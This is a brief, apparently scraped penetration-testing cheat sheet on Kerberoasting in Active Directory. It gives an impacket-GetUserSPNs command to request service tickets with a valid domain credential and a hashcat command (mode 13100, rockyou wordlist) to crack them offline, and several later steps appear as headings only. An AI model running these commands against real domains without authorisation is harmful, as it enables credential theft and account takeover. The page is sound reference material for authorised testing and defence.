Kerberoast
Theory
Having a Credential
Step 1: Impacket-GetUserSPNs
impacket-GetUserSPNs.py '<domain>/<username>:<password>' -dc-ip <target_ip> -requestStep 2: Crack the TGS ticket with hashcat
hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txtHaving a Shell
Step 1: GetUserSPNs
Step 2: Request service tickets
Step 3: Export service ticket to kirbi file
Step 4: Crack the kirbi file with John
Password Spray
Reference
Last updated